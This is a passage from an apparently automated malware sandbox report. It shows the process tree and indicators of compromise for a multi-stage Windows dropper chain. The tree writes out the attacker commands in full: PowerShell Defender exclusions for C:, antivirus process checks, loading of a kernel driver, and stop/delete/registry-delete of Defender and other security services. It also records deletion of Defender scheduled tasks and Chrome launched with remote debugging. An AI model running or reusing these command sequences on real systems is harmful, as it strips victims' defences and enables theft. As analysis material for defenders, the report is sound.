Token: SeBackupPrivilege	8332	22b31629.exe
Token: SeRestorePrivilege	8332	22b31629.exe
Token: SeLoadDriverPrivilege	8332	22b31629.exe
Token: SeShutdownPrivilege	8332	22b31629.exe
Token: SeSystemEnvironmentPrivilege	8332	22b31629.exe
Token: SeSecurityPrivilege	8332	22b31629.exe
Token: SeShutdownPrivilege	7836	chrome.exe
Token: SeCreatePagefilePrivilege	7836	chrome.exe
Token: SeShutdownPrivilege	7836	chrome.exe
Token: SeCreatePagefilePrivilege	7836	chrome.exe
Token: SeShutdownPrivilege	7836	chrome.exe
Token: SeCreatePagefilePrivilege	7836	chrome.exe
Token: SeShutdownPrivilege	7836	chrome.exe
Token: SeCreatePagefilePrivilege	7836	chrome.exe
Token: SeShutdownPrivilege	7836	chrome.exe
Token: SeCreatePagefilePrivilege	7836	chrome.exe
Token: SeShutdownPrivilege	7836	chrome.exe
Token: SeCreatePagefilePrivilege	7836	chrome.exe
Token: SeShutdownPrivilege	7836	chrome.exe
Token: SeCreatePagefilePrivilege	7836	chrome.exe

Suspicious use of FindShellTrayWindow 29 IoCs

pid	Process
9608	Passwords.com
9608	Passwords.com
9608	Passwords.com
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
9608	Passwords.com
9608	Passwords.com
9608	Passwords.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2216 wrote to memory of 5804	2216	random.exe	80
PID 2216 wrote to memory of 5804	2216	random.exe	80
PID 2216 wrote to memory of 5804	2216	random.exe	80
PID 2548 wrote to memory of 5940	2548	cmd.exe	81
PID 2548 wrote to memory of 5940	2548	cmd.exe	81
PID 5804 wrote to memory of 4636	5804	g0F78.exe	84
PID 5804 wrote to memory of 4636	5804	g0F78.exe	84
PID 5804 wrote to memory of 4636	5804	g0F78.exe	84
PID 3672 wrote to memory of 3132	3672	cmd.exe	85
PID 3672 wrote to memory of 3132	3672	cmd.exe	85
PID 4636 wrote to memory of 4908	4636	1R32M4.exe	86
PID 4636 wrote to memory of 4908	4636	1R32M4.exe	86
PID 4636 wrote to memory of 4908	4636	1R32M4.exe	86
PID 5804 wrote to memory of 4992	5804	g0F78.exe	87
PID 5804 wrote to memory of 4992	5804	g0F78.exe	87
PID 5804 wrote to memory of 4992	5804	g0F78.exe	87
PID 4908 wrote to memory of 2936	4908	rapes.exe	89
PID 4908 wrote to memory of 2936	4908	rapes.exe	89
PID 4908 wrote to memory of 2936	4908	rapes.exe	89
PID 2936 wrote to memory of 5752	2936	u75a1_003.exe	90
PID 2936 wrote to memory of 5752	2936	u75a1_003.exe	90
PID 2936 wrote to memory of 5520	2936	u75a1_003.exe	91
PID 2936 wrote to memory of 5520	2936	u75a1_003.exe	91
PID 5752 wrote to memory of 5208	5752	cmd.exe	97
PID 5752 wrote to memory of 5208	5752	cmd.exe	97
PID 5520 wrote to memory of 1944	5520	svchost.exe	99
PID 5520 wrote to memory of 1944	5520	svchost.exe	99
PID 5520 wrote to memory of 5172	5520	svchost.exe	100
PID 5520 wrote to memory of 5172	5520	svchost.exe	100
PID 4908 wrote to memory of 2352	4908	rapes.exe	101
PID 4908 wrote to memory of 2352	4908	rapes.exe	101
PID 4908 wrote to memory of 2352	4908	rapes.exe	101
PID 1944 wrote to memory of 13884	1944	tzutil.exe	102
PID 1944 wrote to memory of 13884	1944	tzutil.exe	102
PID 2352 wrote to memory of 2332	2352	7IIl2eE.exe	104
PID 2352 wrote to memory of 2332	2352	7IIl2eE.exe	104
PID 2352 wrote to memory of 2332	2352	7IIl2eE.exe	104
PID 2332 wrote to memory of 8404	2332	CMD.exe	106
PID 2332 wrote to memory of 8404	2332	CMD.exe	106
PID 2332 wrote to memory of 8404	2332	CMD.exe	106
PID 2332 wrote to memory of 8420	2332	CMD.exe	107
PID 2332 wrote to memory of 8420	2332	CMD.exe	107
PID 2332 wrote to memory of 8420	2332	CMD.exe	107
PID 2332 wrote to memory of 8676	2332	CMD.exe	108
PID 2332 wrote to memory of 8676	2332	CMD.exe	108
PID 2332 wrote to memory of 8676	2332	CMD.exe	108
PID 2332 wrote to memory of 8696	2332	CMD.exe	109
PID 2332 wrote to memory of 8696	2332	CMD.exe	109
PID 2332 wrote to memory of 8696	2332	CMD.exe	109
PID 2332 wrote to memory of 8788	2332	CMD.exe	110
PID 2332 wrote to memory of 8788	2332	CMD.exe	110
PID 2332 wrote to memory of 8788	2332	CMD.exe	110
PID 2332 wrote to memory of 8848	2332	CMD.exe	111
PID 2332 wrote to memory of 8848	2332	CMD.exe	111
PID 2332 wrote to memory of 8848	2332	CMD.exe	111
PID 2332 wrote to memory of 3096	2332	CMD.exe	112
PID 2332 wrote to memory of 3096	2332	CMD.exe	112
PID 2332 wrote to memory of 3096	2332	CMD.exe	112
PID 2332 wrote to memory of 9224	2332	CMD.exe	113
PID 2332 wrote to memory of 9224	2332	CMD.exe	113
PID 2332 wrote to memory of 9224	2332	CMD.exe	113
PID 2332 wrote to memory of 9456	2332	CMD.exe	114
PID 2332 wrote to memory of 9456	2332	CMD.exe	114
PID 2332 wrote to memory of 9456	2332	CMD.exe	114

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:3000
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:10208
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:11692

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2216
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\g0F78.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\g0F78.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5804
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1R32M4.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1R32M4.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4636
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4908
    - - C:\Users\Admin\AppData\Local\Temp\10337510101\u75a1_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337510101\u75a1_003.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:2936
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:5752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5208
      - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        6⤵
        Downloads MZ/PE file
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:5520
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        7⤵
        Sets service image path in registry
        Executes dropped EXE
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:13884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:10448
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        7⤵
        Deletes itself
        Executes dropped EXE
        
        PID:5172
        
        C:\Users\Admin\AppData\Local\Temp\{263d73b8-520c-443b-ab00-af5160063627}\2a0f2bc6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{263d73b8-520c-443b-ab00-af5160063627}\2a0f2bc6.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        8⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:4836
        
        C:\Users\Admin\AppData\Local\Temp\{8e0229a0-e4df-4ac2-ad69-d278b29409c2}\22b31629.exe
        
        C:/Users/Admin/AppData/Local/Temp/{8e0229a0-e4df-4ac2-ad69-d278b29409c2}/\22b31629.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:8332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\{3a99b3e1-f3b3-48a4-98d6-9171b7db485b}\35d52f48-8d29-45f4-950d-8adf522167ee.cmd" "
        10⤵
        
        PID:9068
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        11⤵
        
        PID:10624
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v 35d52f48-8d29-45f4-950d-8adf522167ee /f
        11⤵
        Modifies registry key
        
        PID:10684
    - - C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2352
      - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2332
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:8404
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:8420
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:8676
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:8696
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:8788
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:8848
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3096
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:9224
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:9456
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:9608
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:9868
    - - C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:10024
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:10092
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10092 -s 568
        7⤵
        Program crash
        
        PID:10356
    - - C:\Users\Admin\AppData\Local\Temp\10340260101\47d39b3628.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10340260101\47d39b3628.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:10972
    - - C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:11448
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:11496
    - - C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3740
    - - C:\Users\Admin\AppData\Local\Temp\10362200101\39dcfe81d4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10362200101\39dcfe81d4.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:11952
    - - C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:12428
      - C:\Users\Admin\AppData\Local\Temp\22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\22.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:12628
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8652.tmp\8653.tmp\8654.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
        7⤵
        
        PID:12952
        
        C:\Users\Admin\AppData\Local\Temp\22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\22.exe" go
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:13088
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\871D.tmp\871E.tmp\871F.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
        9⤵
        
        PID:2184
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        10⤵
        Launches sc.exe
        
        PID:13204
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        10⤵
        Launches sc.exe
        
        PID:13244
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        10⤵
        Delays execution with timeout.exe
        
        PID:13276
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        10⤵
        Launches sc.exe
        
        PID:13304
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        10⤵
        Launches sc.exe
        
        PID:3312
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2012
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:876
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        10⤵
        Launches sc.exe
        
        PID:3636
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        10⤵
        Launches sc.exe
        
        PID:644
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        10⤵
        
        PID:13316
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        10⤵
        Launches sc.exe
        
        PID:13356
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        10⤵
        Launches sc.exe
        
        PID:13372
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        10⤵
        
        PID:13404
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        10⤵
        Launches sc.exe
        
        PID:3252
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        10⤵
        Launches sc.exe
        
        PID:13448
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        10⤵
        
        PID:13460
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        10⤵
        Launches sc.exe
        
        PID:13480
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        10⤵
        Launches sc.exe
        
        PID:13536
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        10⤵
        
        PID:13556
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        10⤵
        Launches sc.exe
        
        PID:13560
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        10⤵
        Launches sc.exe
        
        PID:13584
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        10⤵
        
        PID:13608
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        10⤵
        Launches sc.exe
        
        PID:13636
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        10⤵
        Launches sc.exe
        
        PID:13656
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        10⤵
        
        PID:13684
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        10⤵
        Launches sc.exe
        
        PID:3360
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        10⤵
        Launches sc.exe
        
        PID:548
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        10⤵
        
        PID:13752
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        10⤵
        Launches sc.exe
        
        PID:1384
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        10⤵
        Launches sc.exe
        
        PID:3144
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        10⤵
        
        PID:13792
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        10⤵
        Launches sc.exe
        
        PID:13808
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        10⤵
        Launches sc.exe
        
        PID:13820
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        10⤵
        
        PID:3412
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        10⤵
        Launches sc.exe
        
        PID:13880
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        10⤵
        Launches sc.exe
        
        PID:13868
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        10⤵
        
        PID:3264
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        10⤵
        Launches sc.exe
        
        PID:5036
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        10⤵
        Launches sc.exe
        
        PID:5828
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        10⤵
        
        PID:5528
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        10⤵
        Launches sc.exe
        
        PID:3992
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        10⤵
        Launches sc.exe
        
        PID:5024
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        10⤵
        
        PID:5016
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        10⤵
        Launches sc.exe
        
        PID:6204
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        10⤵
        Launches sc.exe
        
        PID:6388
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        10⤵
        
        PID:6440
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        10⤵
        Launches sc.exe
        
        PID:6452
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        10⤵
        Launches sc.exe
        
        PID:13940
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        10⤵
        
        PID:6680
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        10⤵
        Launches sc.exe
        
        PID:7060
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        10⤵
        Launches sc.exe
        
        PID:7120
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        10⤵
        
        PID:7144
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        10⤵
        Launches sc.exe
        
        PID:7164
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        10⤵
        Launches sc.exe
        
        PID:4720
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        10⤵
        
        PID:4676
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        10⤵
        
        PID:4532
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        10⤵
        
        PID:1276
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        10⤵
        
        PID:4816
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        10⤵
        
        PID:3132
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        10⤵
        Launches sc.exe
        
        PID:568
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        10⤵
        Launches sc.exe
        
        PID:3368
    - - C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:7380
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:7460
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Drops file in Windows directory
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:7836
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xdc,0x13c,0x140,0x118,0x144,0x7ff9e4f3dcf8,0x7ff9e4f3dd04,0x7ff9e4f3dd10
        8⤵
        
        PID:7980
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1944,i,15820017676049557782,9757415820980615826,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1932 /prefetch:2
        8⤵
        
        PID:10304
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1516,i,15820017676049557782,9757415820980615826,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2292 /prefetch:11
        8⤵
        
        PID:10208
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2412,i,15820017676049557782,9757415820980615826,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2432 /prefetch:13
        8⤵
        
        PID:10664
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3280,i,15820017676049557782,9757415820980615826,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3292 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:10956
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
